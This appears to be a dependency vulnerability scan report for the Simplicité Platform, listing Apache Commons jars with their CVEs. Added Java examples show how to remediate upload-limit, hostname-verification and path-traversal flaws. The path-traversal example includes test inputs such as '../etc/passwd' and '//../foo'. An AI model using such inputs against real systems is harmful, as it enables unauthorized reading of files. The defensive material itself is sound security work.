simonetripodi Medium Vendor pom developer id sullis Medium Vendor pom 
developer name Daniel Rall Medium Vendor pom developer name dIon Gillard Medium Vendor pom developer name Gary Gregory Medium Vendor pom developer name Jason van Zyl Medium Vendor pom developer name Jochen Wiedmann Medium Vendor pom developer name John McNally Medium Vendor pom developer name Martin Cooper Medium Vendor pom developer name Rob Tompkins Medium Vendor pom developer name Robert Burrell Donkin Medium Vendor pom developer name Sean C. Sullivan Medium Vendor pom developer name Simone Tripodi Medium Vendor pom developer org Adobe Medium Vendor pom developer org CollabNet Medium Vendor pom developer org Multitask Consulting Medium Vendor pom developer org Yahoo! Medium Vendor pom developer org Zenplex Medium Vendor pom groupid commons-fileupload Highest Vendor pom name Apache Commons FileUpload High Vendor pom parent-artifactid commons-parent Low Vendor pom parent-groupid org.apache.commons Medium Vendor pom url http://commons.apache.org/proper/commons-fileupload/ Highest Product file name commons-fileupload High Product jar package name apache Highest Product jar package name commons Highest Product jar package name fileupload Highest Product Manifest bundle-docurl http://commons.apache.org/proper/commons-fileupload/ Low Product Manifest Bundle-Name Apache Commons FileUpload Medium Product Manifest bundle-symbolicname org.apache.commons.commons-fileupload Medium Product Manifest implementation-build UNKNOWN@r047f31576411beee69cf75584ae76531cc9ac753; 2018-12-24 07:06:18+0000 Low Product Manifest Implementation-Title Apache Commons FileUpload High Product Manifest implementation-url http://commons.apache.org/proper/commons-fileupload/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product Manifest specification-title Apache Commons FileUpload Medium Product pom artifactid commons-fileupload Highest Product pom developer email chtompki@apache.org Low Product pom developer email dion@apache.org Low Product pom 
developer email dlr@finemaltcoding.com Low Product pom developer email ggregory@apache.org Low Product pom developer email jason@zenplex.com Low Product pom developer email jmcnally@collab.net Low Product pom developer email jochen.wiedmann@gmail.com Low Product pom developer email martinc@apache.org Low Product pom developer email rdonkin@apache.org Low Product pom developer email sean |at| seansullivan |dot| com Low Product pom developer email simonetripodi@apache.org Low Product pom developer id chtompki Low Product pom developer id dion Low Product pom developer id dlr Low Product pom developer id ggregory Low Product pom developer id jmcnally Low Product pom developer id jochen Low Product pom developer id jvanzyl Low Product pom developer id martinc Low Product pom developer id rdonkin Low Product pom developer id simonetripodi Low Product pom developer id sullis Low Product pom developer name Daniel Rall Low Product pom developer name dIon Gillard Low Product pom developer name Gary Gregory Low Product pom developer name Jason van Zyl Low Product pom developer name Jochen Wiedmann Low Product pom developer name John McNally Low Product pom developer name Martin Cooper Low Product pom developer name Rob Tompkins Low Product pom developer name Robert Burrell Donkin Low Product pom developer name Sean C. Sullivan Low Product pom developer name Simone Tripodi Low Product pom developer org Adobe Low Product pom developer org CollabNet Low Product pom developer org Multitask Consulting Low Product pom developer org Yahoo! 
Low Product pom developer org Zenplex Low Product pom groupid commons-fileupload Highest Product pom name Apache Commons FileUpload High Product pom parent-artifactid commons-parent Medium Product pom parent-groupid org.apache.commons Medium Product pom url http://commons.apache.org/proper/commons-fileupload/ Medium Version file version 1.4 High Version Manifest Implementation-Version 1.4 High Version pom parent-version 1.4 Low Version pom version 1.4 Highest
CVE-2023-24998
Apache Commons FileUpload before 1.5 does not limit the number of request parts to be processed resulting in the possibility of an attacker triggering a DoS with a malicious upload or series of uploads.
Note that, like all of the file upload limits, the new configuration option (FileUploadBase#setFileCountMax) is not enabled by default and must be explicitly configured.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
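The remediation the advisory describes has two parts: move to commons-fileupload 1.5 or later, where FileUploadBase#setFileCountMax exists, and then set it explicitly, because it is off by default like every other upload limit. The servlet below is an added example (not code from the Simplicité platform or from Commons FileUpload) showing all three limits configured together and the resulting exceptions mapped to client errors; the limit values and the servlet name are illustrative assumptions.

```java
// Added example: requires commons-fileupload 1.5+ (setFileCountMax was introduced
// in 1.5) and the javax.servlet API. Limit values are illustrative assumptions,
// not values taken from the scanned project.
import java.io.IOException;
import java.util.List;

import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

import org.apache.commons.fileupload.FileItem;
import org.apache.commons.fileupload.FileUploadBase;
import org.apache.commons.fileupload.FileUploadException;
import org.apache.commons.fileupload.disk.DiskFileItemFactory;
import org.apache.commons.fileupload.servlet.ServletFileUpload;

public class BoundedUploadServlet extends HttpServlet {

    private static final long MAX_PARTS         = 50;                // parts per request (CVE-2023-24998)
    private static final long MAX_FILE_BYTES    = 10L * 1024 * 1024; // bytes per uploaded file
    private static final long MAX_REQUEST_BYTES = 20L * 1024 * 1024; // bytes for the whole multipart body

    // Build a parser with every limit set explicitly. Without setFileCountMax a
    // client can send an unbounded number of parts; each becomes a FileItem
    // (possibly a temp file) and can exhaust memory, file handles or disk.
    static ServletFileUpload newUploadParser() {
        ServletFileUpload upload = new ServletFileUpload(new DiskFileItemFactory());
        upload.setFileCountMax(MAX_PARTS);      // new in 1.5; disabled by default
        upload.setFileSizeMax(MAX_FILE_BYTES);  // disabled by default
        upload.setSizeMax(MAX_REQUEST_BYTES);   // disabled by default
        return upload;
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        if (!ServletFileUpload.isMultipartContent(req)) {
            resp.sendError(HttpServletResponse.SC_BAD_REQUEST, "multipart/form-data expected");
            return;
        }
        List<FileItem> items;
        try {
            items = newUploadParser().parseRequest(req);
        } catch (FileUploadBase.FileCountLimitExceededException e) {
            // Part count exceeded: the parser stops before processing further parts.
            resp.sendError(HttpServletResponse.SC_BAD_REQUEST, "too many parts in request");
            return;
        } catch (FileUploadBase.SizeLimitExceededException
               | FileUploadBase.FileSizeLimitExceededException e) {
            resp.sendError(HttpServletResponse.SC_REQUEST_ENTITY_TOO_LARGE, "upload too large");
            return;
        } catch (FileUploadException e) {
            resp.sendError(HttpServletResponse.SC_BAD_REQUEST, "malformed multipart body");
            return;
        }
        try {
            for (FileItem item : items) {
                if (!item.isFormField()) {
                    // Application-specific handling of item.getInputStream() goes here.
                }
            }
        } finally {
            // Release temp files created by DiskFileItemFactory for every part,
            // including parts that were never read.
            for (FileItem item : items) {
                item.delete();
            }
        }
    }
}
```

The count limit is enforced by the parser while the body is being read, so a request carrying thousands of tiny parts is rejected as soon as the limit is crossed rather than after all parts have been materialised. The same parser configuration applies to the streaming API (getItemIterator), which shares FileUploadBase.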
commons-httpclient-3.1.jar
Description:
The HttpClient component supports the client-side of RFC 1945 (HTTP/1.0) and RFC 2616 (HTTP/1.1), several related specifications (RFC 2109 (Cookies), RFC 2617 (HTTP Authentication), etc.), and provides a framework by which new request types (methods) or HTTP extensions can be created easily.
License: Apache License (http://www.apache.org/licenses/LICENSE-2.0)
File Path: /var/simplicite/.m2/repository/commons-httpclient/commons-httpclient/3.1/commons-httpclient-3.1.jar
MD5: 8ad8c9229ef2d59ab9f59f7050e846a5
SHA1: 964cd74171f427720480efdec40a7c7f6e58426a
SHA256: dbd4953d013e10e7c1cc3701a3e6ccd8c950c892f08d804fabfac21705930443
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-httpclient High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name httpclient Highest Vendor jar package name methods Highest Vendor manifest: org/apache/commons/httpclient Implementation-Vendor Apache Software Foundation Medium Vendor pom artifactid commons-httpclient Highest Vendor pom artifactid commons-httpclient Low Vendor pom developer email adrian.sutton -at- ephox.com Low Vendor pom developer email dion -at- apache.org Low Vendor pom developer email jericho -at- apache.org Low Vendor pom developer email jsdever -at- apache.org Low Vendor pom developer email mbecke -at- apache.org Low Vendor pom developer email oglueck -at- apache.org Low Vendor pom developer email olegk -at- apache.org Low Vendor pom developer email rwaldhoff -at- apache Low Vendor pom developer email sullis -at- apache.org Low Vendor pom developer id adrian Medium Vendor pom developer id dion Medium Vendor pom developer id jericho Medium Vendor pom developer id jsdever Medium Vendor pom developer id mbecke Medium Vendor pom developer id oglueck Medium Vendor pom developer id olegk Medium Vendor pom developer id rwaldhoff Medium Vendor pom developer id sullis Medium Vendor pom developer name Adrian Sutton Medium Vendor pom developer name dIon Gillard Medium Vendor pom developer name Jeff Dever Medium Vendor pom developer name Michael Becke Medium Vendor pom developer name Oleg Kalnichevski Medium Vendor pom developer name Ortwin Glueck Medium Vendor pom developer name Rodney Waldhoff Medium Vendor pom developer name Sean C. 
Sullivan Medium Vendor pom developer name Sung-Gu Medium Vendor pom developer org Britannica Medium Vendor pom developer org Independent consultant Medium Vendor pom developer org Intencha Medium Vendor pom developer org Multitask Consulting Medium Vendor pom groupid commons-httpclient Highest Vendor pom name HttpClient High Vendor pom organization name Apache Software Foundation High Vendor pom organization url http://jakarta.apache.org/ Medium Vendor pom url http://jakarta.apache.org/httpcomponents/httpclient-3.x/ Highest Product file name commons-httpclient High Product jar package name apache Highest Product jar package name commons Highest Product jar package name httpclient Highest Product jar package name methods Highest Product manifest: org/apache/commons/httpclient Implementation-Title org.apache.commons.httpclient Medium Product manifest: org/apache/commons/httpclient Specification-Title Jakarta Commons HttpClient Medium Product pom artifactid commons-httpclient Highest Product pom developer email adrian.sutton -at- ephox.com Low Product pom developer email dion -at- apache.org Low Product pom developer email jericho -at- apache.org Low Product pom developer email jsdever -at- apache.org Low Product pom developer email mbecke -at- apache.org Low Product pom developer email oglueck -at- apache.org Low Product pom developer email olegk -at- apache.org Low Product pom developer email rwaldhoff -at- apache Low Product pom developer email sullis -at- apache.org Low Product pom developer id adrian Low Product pom developer id dion Low Product pom developer id jericho Low Product pom developer id jsdever Low Product pom developer id mbecke Low Product pom developer id oglueck Low Product pom developer id olegk Low Product pom developer id rwaldhoff Low Product pom developer id sullis Low Product pom developer name Adrian Sutton Low Product pom developer name dIon Gillard Low Product pom developer name Jeff Dever Low Product pom developer name Michael Becke Low 
Product pom developer name Oleg Kalnichevski Low Product pom developer name Ortwin Glueck Low Product pom developer name Rodney Waldhoff Low Product pom developer name Sean C. Sullivan Low Product pom developer name Sung-Gu Low Product pom developer org Britannica Low Product pom developer org Independent consultant Low Product pom developer org Intencha Low Product pom developer org Multitask Consulting Low Product pom groupid commons-httpclient Highest Product pom name HttpClient High Product pom organization name Apache Software Foundation Low Product pom organization url http://jakarta.apache.org/ Low Product pom url http://jakarta.apache.org/httpcomponents/httpclient-3.x/ Medium Version file version 3.1 High Version manifest: org/apache/commons/httpclient Implementation-Version 3.1 Medium Version pom version 3.1 Highest
CVE-2012-5783
Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
CWE-295 Improper Certificate Validation
CVSSv2: Base Score: MEDIUM (5.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:N
References:
Vulnerable Software & Versions:
CVE-2020-13956
Apache HttpClient versions prior to version 4.5.13 and 5.0.3 can misinterpret malformed authority component in request URIs passed to the library as java.net.URI object and pick the wrong target host for request execution.
NVD-CWE-noinfo
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N
CVSSv3: Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
References:
Vulnerable Software & Versions:
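Commons HttpClient 3.1 is the last release of the 3.x line, so there is no patched 3.x artifact for CVE-2012-5783; the durable fix is to migrate to HttpComponents HttpClient 4.5.13+ or 5.0.3+, which verify the server name by default and also carry the fix for CVE-2020-13956 (the "prior to 4.5.13" wording is why the scanner matches 3.1 against that entry as well). Where the 3.1 jar cannot be replaced immediately, the missing check can be added without forking the library: 3.x lets you register your own SecureProtocolSocketFactory for the https scheme. The class below is an added example (not code from the Simplicité platform or from the HttpClient project) that does exactly that, asking JSSE to perform RFC 2818 host name matching against the certificate's CN/subjectAltName during the handshake. The class name and the URL in main are illustrative assumptions; the example needs Java 7 or later for SSLParameters#setEndpointIdentificationAlgorithm.

```java
// Added example: commons-httpclient 3.1 with JSSE host name verification switched
// on. The default SSLProtocolSocketFactory in 3.1 never checks the host name
// against the certificate (CVE-2012-5783). Class name and URL are assumptions.
import java.io.IOException;
import java.net.InetAddress;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.net.SocketTimeoutException;

import javax.net.ssl.SSLParameters;
import javax.net.ssl.SSLSocket;
import javax.net.ssl.SSLSocketFactory;

import org.apache.commons.httpclient.ConnectTimeoutException;
import org.apache.commons.httpclient.HttpClient;
import org.apache.commons.httpclient.methods.GetMethod;
import org.apache.commons.httpclient.params.HttpConnectionParams;
import org.apache.commons.httpclient.protocol.Protocol;
import org.apache.commons.httpclient.protocol.ProtocolSocketFactory;
import org.apache.commons.httpclient.protocol.SecureProtocolSocketFactory;

public class HostnameVerifyingSocketFactory implements SecureProtocolSocketFactory {

    private final SSLSocketFactory jsse = (SSLSocketFactory) SSLSocketFactory.getDefault();

    // Layer TLS over an already-connected socket, passing the host name we meant to
    // reach so JSSE can (a) send it as SNI and (b) match it against the certificate's
    // CN / subjectAltName during the handshake ("HTTPS" = RFC 2818 rules).
    private SSLSocket layerTls(Socket plain, String host, int port, boolean autoClose)
            throws IOException {
        SSLSocket ssl = (SSLSocket) jsse.createSocket(plain, host, port, autoClose);
        SSLParameters params = ssl.getSSLParameters();
        params.setEndpointIdentificationAlgorithm("HTTPS");
        ssl.setSSLParameters(params);
        ssl.startHandshake(); // SSLHandshakeException on a name mismatch or untrusted chain
        return ssl;
    }

    // Plain TCP connect, honouring HttpClient's connection timeout (0 = no timeout).
    private Socket connectPlain(String host, int port, InetAddress localAddr, int localPort,
                                int timeoutMillis) throws IOException {
        Socket plain = new Socket();
        if (localAddr != null) {
            plain.bind(new InetSocketAddress(localAddr, localPort));
        }
        try {
            plain.connect(new InetSocketAddress(host, port), timeoutMillis);
        } catch (SocketTimeoutException e) {
            plain.close();
            throw new ConnectTimeoutException("connect to " + host + ":" + port + " timed out", e);
        }
        return plain;
    }

    @Override
    public Socket createSocket(Socket socket, String host, int port, boolean autoClose)
            throws IOException {
        return layerTls(socket, host, port, autoClose);
    }

    @Override
    public Socket createSocket(String host, int port) throws IOException {
        return layerTls(connectPlain(host, port, null, 0, 0), host, port, true);
    }

    @Override
    public Socket createSocket(String host, int port, InetAddress localAddr, int localPort)
            throws IOException {
        return layerTls(connectPlain(host, port, localAddr, localPort, 0), host, port, true);
    }

    @Override
    public Socket createSocket(String host, int port, InetAddress localAddr, int localPort,
                               HttpConnectionParams params) throws IOException {
        int timeout = params == null ? 0 : params.getConnectionTimeout();
        return layerTls(connectPlain(host, port, localAddr, localPort, timeout), host, port, true);
    }

    // Register once at startup; every https URL handled by HttpClient 3.1 in this JVM
    // then goes through this factory instead of the non-verifying default.
    public static void install() {
        Protocol https = new Protocol("https",
                (ProtocolSocketFactory) new HostnameVerifyingSocketFactory(), 443);
        Protocol.registerProtocol("https", https);
    }

    public static void main(String[] args) throws IOException {
        install();
        HttpClient client = new HttpClient();
        GetMethod get = new GetMethod("https://example.org/"); // illustrative URL
        try {
            // A server presenting a valid certificate for a different name now fails
            // inside layerTls instead of being accepted silently.
            System.out.println("HTTP " + client.executeMethod(get));
        } finally {
            get.releaseConnection();
        }
    }
}
```

Protocol registration is JVM-global in 3.x, so install() must run before any code in the same JVM creates an HttpClient connection, and any other component that registers its own https Protocol later will silently replace this one; a startup check that Protocol.getProtocol("https").getSocketFactory() is still this class is a cheap guard.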
commons-io-2.6.jar
Description:
The Apache Commons IO library contains utility classes, stream implementations, file filters,
file comparators, endian transformation classes, and much more.
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar
MD5: 467c2a1f64319c99b5faf03fc78572af
SHA1: 815893df5f31da2ece4040fe0a12fd44b577afaf
SHA256: f877d304660ac2a142f3865badfc971dec7ed73c747c7f8d5d2f5139ca736513
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-io High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name io Highest Vendor Manifest automatic-module-name org.apache.commons.io Medium Vendor Manifest bundle-docurl http://commons.apache.org/proper/commons-io/ Low Vendor Manifest bundle-symbolicname org.apache.commons.io Medium Vendor Manifest implementation-url http://commons.apache.org/proper/commons-io/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id commons-io Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-io Highest Vendor pom artifactid commons-io Low Vendor pom developer email bayard@apache.org Low Vendor pom developer email dion@apache.org Low Vendor pom developer email ggregory@apache.org Low Vendor pom developer email jeremias@apache.org Low Vendor pom developer email jochen.wiedmann@gmail.com Low Vendor pom developer email krosenvold@apache.org Low Vendor pom developer email martinc@apache.org Low Vendor pom developer email matth@apache.org Low Vendor pom developer email nicolaken@apache.org Low Vendor pom developer email roxspring@apache.org Low Vendor pom developer email sanders@apache.org Low Vendor pom developer id bayard Medium Vendor pom developer id dion Medium Vendor pom developer id ggregory Medium Vendor pom developer id jeremias Medium Vendor pom developer id jochen Medium Vendor pom developer id jukka Medium Vendor pom developer id krosenvold Medium Vendor pom developer id martinc Medium Vendor pom developer id matth Medium Vendor pom developer id niallp Medium Vendor pom developer id nicolaken Medium Vendor pom developer id roxspring Medium Vendor pom developer id sanders Medium Vendor pom developer id scolebourne Medium Vendor pom developer name dIon 
Gillard Medium Vendor pom developer name Gary Gregory Medium Vendor pom developer name Henri Yandell Medium Vendor pom developer name Jeremias Maerki Medium Vendor pom developer name Jochen Wiedmann Medium Vendor pom developer name Jukka Zitting Medium Vendor pom developer name Kristian Rosenvold Medium Vendor pom developer name Martin Cooper Medium Vendor pom developer name Matthew Hawthorne Medium Vendor pom developer name Niall Pemberton Medium Vendor pom developer name Nicola Ken Barozzi Medium Vendor pom developer name Rob Oxspring Medium Vendor pom developer name Scott Sanders Medium Vendor pom developer name Stephen Colebourne Medium Vendor pom groupid commons-io Highest Vendor pom name Apache Commons IO High Vendor pom parent-artifactid commons-parent Low Vendor pom parent-groupid org.apache.commons Medium Vendor pom url http://commons.apache.org/proper/commons-io/ Highest Product file name commons-io High Product jar package name apache Highest Product jar package name commons Highest Product jar package name io Highest Product Manifest automatic-module-name org.apache.commons.io Medium Product Manifest bundle-docurl http://commons.apache.org/proper/commons-io/ Low Product Manifest Bundle-Name Apache Commons IO Medium Product Manifest bundle-symbolicname org.apache.commons.io Medium Product Manifest Implementation-Title Apache Commons IO High Product Manifest implementation-url http://commons.apache.org/proper/commons-io/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title Apache Commons IO Medium Product pom artifactid commons-io Highest Product pom developer email bayard@apache.org Low Product pom developer email dion@apache.org Low Product pom developer email ggregory@apache.org Low Product pom developer email jeremias@apache.org Low Product pom developer email jochen.wiedmann@gmail.com Low Product pom developer email krosenvold@apache.org Low Product pom developer email 
martinc@apache.org Low Product pom developer email matth@apache.org Low Product pom developer email nicolaken@apache.org Low Product pom developer email roxspring@apache.org Low Product pom developer email sanders@apache.org Low Product pom developer id bayard Low Product pom developer id dion Low Product pom developer id ggregory Low Product pom developer id jeremias Low Product pom developer id jochen Low Product pom developer id jukka Low Product pom developer id krosenvold Low Product pom developer id martinc Low Product pom developer id matth Low Product pom developer id niallp Low Product pom developer id nicolaken Low Product pom developer id roxspring Low Product pom developer id sanders Low Product pom developer id scolebourne Low Product pom developer name dIon Gillard Low Product pom developer name Gary Gregory Low Product pom developer name Henri Yandell Low Product pom developer name Jeremias Maerki Low Product pom developer name Jochen Wiedmann Low Product pom developer name Jukka Zitting Low Product pom developer name Kristian Rosenvold Low Product pom developer name Martin Cooper Low Product pom developer name Matthew Hawthorne Low Product pom developer name Niall Pemberton Low Product pom developer name Nicola Ken Barozzi Low Product pom developer name Rob Oxspring Low Product pom developer name Scott Sanders Low Product pom developer name Stephen Colebourne Low Product pom groupid commons-io Highest Product pom name Apache Commons IO High Product pom parent-artifactid commons-parent Medium Product pom parent-groupid org.apache.commons Medium Product pom url http://commons.apache.org/proper/commons-io/ Medium Version file version 2.6 High Version Manifest Implementation-Version 2.6 High Version pom parent-version 2.6 Low Version pom version 2.6 Highest
CVE-2021-29425
In Apache Commons IO before 2.7, when invoking the method FilenameUtils.normalize with an improper input string, like "//../foo", or "\\..\foo", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus "limited" path traversal), if the calling code would use the result to construct a path value.
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CVSSv2: Base Score: MEDIUM (5.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:N
CVSSv3: Base Score: MEDIUM (4.8) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
References:
Vulnerable Software & Versions:
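The advisory only matters to code that uses the return value of FilenameUtils.normalize as its sole defence before building a path. Upgrading to commons-io 2.7 or later makes normalize return null for the two inputs quoted above, but the robust pattern is to treat normalize as a cleanup step and enforce containment on the resolved absolute path, which holds on every version. The class below is an added example (not code from the Simplicité platform or from Commons IO) that puts the normalize-only pattern next to the containment check and runs both over a few constructed inputs, including the two from the advisory; the base directory and the sample inputs are constructed for illustration.

```java
// Added example: confining a user-supplied file name to a base directory.
// Needs commons-io on the classpath (2.6 shows the CVE-2021-29425 behaviour,
// 2.7+ returns null for those inputs). Sample inputs and the temp base
// directory are constructed for illustration.
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

import org.apache.commons.io.FilenameUtils;

public class ConfinedPath {

    // Vulnerable pattern: FilenameUtils.normalize() as the only guard.
    // On commons-io 2.6, "//../foo" and "\\..\foo" come back unchanged, so the
    // resulting path can point one level above baseDir.
    static Path vulnerableResolve(Path baseDir, String userPath) {
        String normalized = FilenameUtils.normalize(userPath);
        return baseDir.resolve(normalized == null ? "" : normalized);
    }

    // Hardened pattern: normalize, resolve against the canonical base, then verify
    // that the result is still inside it. Independent of the commons-io version.
    static Path safeResolve(Path baseDir, String userPath) throws IOException {
        // unixSeparator=true so Windows-style "\\..\foo" is treated as separators too
        String normalized = FilenameUtils.normalize(userPath, true);
        if (normalized == null || normalized.isEmpty()) {
            throw new IOException("rejected path: " + userPath);
        }
        Path base = baseDir.toRealPath();               // canonical, symlinks resolved
        Path target = base.resolve(normalized).normalize();
        if (!target.startsWith(base)) {                 // absolute inputs land outside base
            throw new IOException("path escapes base directory: " + userPath);
        }
        return target;
    }

    public static void main(String[] args) throws IOException {
        Path base = Files.createTempDirectory("confined"); // constructed sample base
        String[] inputs = {
            "report.txt",       // benign
            "docs/a.txt",       // benign, nested
            "../etc/passwd",    // plain traversal: normalize() returns null
            "//../foo",         // CVE-2021-29425 input, returned unchanged on 2.6
            "\\\\..\\foo"       // CVE-2021-29425 input (Java literal for \\..\foo)
        };
        for (String in : inputs) {
            String verdict;
            try {
                verdict = "allowed -> " + safeResolve(base, in);
            } catch (IOException e) {
                verdict = "rejected (" + e.getMessage() + ")";
            }
            System.out.printf("%-14s normalize-only: %s%n%-14s containment:    %s%n",
                    in, vulnerableResolve(base, in), "", verdict);
        }
    }
}
```

The containment check is what actually stops the traversal: on a POSIX system "//../foo" resolves to an absolute path, Path.resolve therefore discards the base, and startsWith(base) fails. Calling toRealPath() on the base (not on the target, which may not exist yet) keeps the comparison honest when the base directory itself sits behind a symlink.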
commons-lang-2.6.jar
Description:
Commons Lang, a package of Java utility classes for the
classes that are in java.lang's hierarchy, or are considered to be so
standard as to justify existence in java.lang.
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/commons-lang/commons-lang/2.6/commons-lang-2.6.jar
MD5: 4d5c1693079575b362edf41500630bbd
SHA1: 0ce1edb914c94ebc388f086c6827e8bdeec71ac2
SHA256: 50f11b09f877c294d56f24463f47d28f929cf5044f648661c0f0cfbae9a2f49c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-lang High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name lang Highest Vendor Manifest bundle-docurl http://commons.apache.org/lang/ Low Vendor Manifest bundle-symbolicname org.apache.commons.lang Medium Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-lang Highest Vendor pom artifactid commons-lang Low Vendor pom developer email bayard@apache.org Low Vendor pom developer email dlr@finemaltcoding.com Low Vendor pom developer email ggregory@seagullsw.com Low Vendor pom developer email jcarman@apache.org Low Vendor pom developer email joerg.schaible@gmx.de Low Vendor pom developer email oheger@apache.org Low Vendor pom developer email pbenedict@apache.org Low Vendor pom developer email phil@steitz.com Low Vendor pom developer email rdonkin@apache.org Low Vendor pom developer email scolebourne@joda.org Low Vendor pom developer email stevencaswell@apache.org Low Vendor pom developer id bayard Medium Vendor pom developer id dlr Medium Vendor pom developer id fredrik Medium Vendor pom developer id ggregory Medium Vendor pom developer id jcarman Medium Vendor pom developer id joehni Medium Vendor pom developer id mbenson Medium Vendor pom developer id niallp Medium Vendor pom developer id oheger Medium Vendor pom developer id pbenedict Medium Vendor pom developer id psteitz Medium Vendor pom developer id rdonkin Medium Vendor pom developer id scaswell Medium Vendor pom developer id scolebourne Medium Vendor pom developer name Daniel Rall Medium Vendor pom developer name Fredrik Westermarck Medium Vendor pom developer name Gary D. 
Gregory Medium Vendor pom developer name Henri Yandell Medium Vendor pom developer name James Carman Medium Vendor pom developer name Joerg Schaible Medium Vendor pom developer name Matt Benson Medium Vendor pom developer name Niall Pemberton Medium Vendor pom developer name Oliver Heger Medium Vendor pom developer name Paul Benedict Medium Vendor pom developer name Phil Steitz Medium Vendor pom developer name Robert Burrell Donkin Medium Vendor pom developer name Stephen Colebourne Medium Vendor pom developer name Steven Caswell Medium Vendor pom developer org Carman Consulting, Inc. Medium Vendor pom developer org CollabNet, Inc. Medium Vendor pom developer org Seagull Software Medium Vendor pom developer org SITA ATS Ltd Medium Vendor pom groupid commons-lang Highest Vendor pom name Commons Lang High Vendor pom parent-artifactid commons-parent Low Vendor pom parent-groupid org.apache.commons Medium Vendor pom url http://commons.apache.org/lang/ Highest Product file name commons-lang High Product jar package name apache Highest Product jar package name commons Highest Product jar package name lang Highest Product Manifest bundle-docurl http://commons.apache.org/lang/ Low Product Manifest Bundle-Name Commons Lang Medium Product Manifest bundle-symbolicname org.apache.commons.lang Medium Product Manifest Implementation-Title Commons Lang High Product Manifest specification-title Commons Lang Medium Product pom artifactid commons-lang Highest Product pom developer email bayard@apache.org Low Product pom developer email dlr@finemaltcoding.com Low Product pom developer email ggregory@seagullsw.com Low Product pom developer email jcarman@apache.org Low Product pom developer email joerg.schaible@gmx.de Low Product pom developer email oheger@apache.org Low Product pom developer email pbenedict@apache.org Low Product pom developer email phil@steitz.com Low Product pom developer email rdonkin@apache.org Low Product pom developer email scolebourne@joda.org Low Product pom 
developer email stevencaswell@apache.org Low Product pom developer id bayard Low Product pom developer id dlr Low Product pom developer id fredrik Low Product pom developer id ggregory Low Product pom developer id jcarman Low Product pom developer id joehni Low Product pom developer id mbenson Low Product pom developer id niallp Low Product pom developer id oheger Low Product pom developer id pbenedict Low Product pom developer id psteitz Low Product pom developer id rdonkin Low Product pom developer id scaswell Low Product pom developer id scolebourne Low Product pom developer name Daniel Rall Low Product pom developer name Fredrik Westermarck Low Product pom developer name Gary D. Gregory Low Product pom developer name Henri Yandell Low Product pom developer name James Carman Low Product pom developer name Joerg Schaible Low Product pom developer name Matt Benson Low Product pom developer name Niall Pemberton Low Product pom developer name Oliver Heger Low Product pom developer name Paul Benedict Low Product pom developer name Phil Steitz Low Product pom developer name Robert Burrell Donkin Low Product pom developer name Stephen Colebourne Low Product pom developer name Steven Caswell Low Product pom developer org Carman Consulting, Inc. Low Product pom developer org CollabNet, Inc. Low Product pom developer org Seagull Software Low Product pom developer org SITA ATS Ltd Low Product pom groupid commons-lang Highest Product pom name Commons Lang High Product pom parent-artifactid commons-parent Medium Product pom parent-groupid org.apache.commons Medium Product pom url http://commons.apache.org/lang/ Medium Version file version 2.6 High Version Manifest Bundle-Version 2.6 High Version Manifest Implementation-Version 2.6 High Version pom parent-version 2.6 Low Version pom version 2.6 Highest
commons-lang3-3.9.jar
Description:
Apache Commons Lang, a package of Java utility classes for the
classes that are in java.lang's hierarchy, or are considered to be so
standard as to justify existence in java.lang.
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/commons/commons-lang3/3.9/commons-lang3-3.9.jar
MD5: fa752c3cb5474b05e14bf2ed7e242020
SHA1: 0122c7cee69b53ed4a7681c03d4ee4c0e2765da5
SHA256: de2e1dcdcf3ef917a8ce858661a06726a9a944f28e33ad7f9e08bea44dc3c230
Referenced In Project/Scope: Simplicite Platform:compile
